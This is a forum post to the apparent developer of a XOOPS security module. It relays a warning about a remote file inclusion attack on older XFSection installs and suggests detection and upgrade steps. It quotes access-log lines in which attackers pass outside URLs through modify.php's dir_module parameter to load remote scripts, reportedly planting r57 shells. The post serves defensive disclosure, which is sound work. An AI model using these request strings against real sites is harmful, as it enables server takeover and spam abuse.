GIJOE

I want to bring a new hack to your attention to see if there is anything that can be added into Protector to prevent it in future. It is getting through older versions of XFSection.

The following is a copy of comment in news item at xoops org.

---

If you are running XFSection then look in your site access logs for entries like these:

07.218.231.178 - - [08/Jun/2007:11:42:57 +0100] "GET /modules/xfsection/modify.php?dir_module=http://www.insanmistik.org/x1.txt? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

70.86.113.114 - - [08/Jun/2007:03:09:15 +0100] "GET /modules/xfsection/modify.php?dir_module=http://k52.jp/echo? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

208.67.252.215 - - [08/Jun/2007:03:15:12 +0100] "GET /modules/xfsection/modify.php?dir_module=http://b4ngs4t.com/echo?? HTTP/1.1" 403 490 "-" "libwww-perl/5.79"

65.98.89.146 - - [08/Jun/2007:03:19:52 +0100] "GET /modules/xfsection//modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.1" 403 505 "-" "libwww-perl/5.805"

59.106.13.148 - - [08/Jun/2007:03:28:51 +0100] "GET /modules/xfsection/modify.php?dir_module=http://b4ngs4t.com/echo?? HTTP/1.1" 403 486 "-" "libwww-perl/5.79"

The important bit is /modules/xfsection/modify.php?dir_module=

followed by a random URL 'libwww-perl' as a user-agent may also be relevent.

This is apparently letting in r57shells (that's what I'm told, the only reference I can find is in German here finden@@blocken_anzeigen.html" target="_blank">http://www.phpforum.de/archiv_57320_PHPShells@finden@@blocken_anzeigen.html
)

If you have these types of entries then you are being hacked and the server you are running on is being used to send junk spam mail, potentially in the tens of thousands.

Upgrade to SmartSection is the answer.

---

News item is at http://www.xoops.org/modules/news/article.php?storyid=3787

Regards
Xooby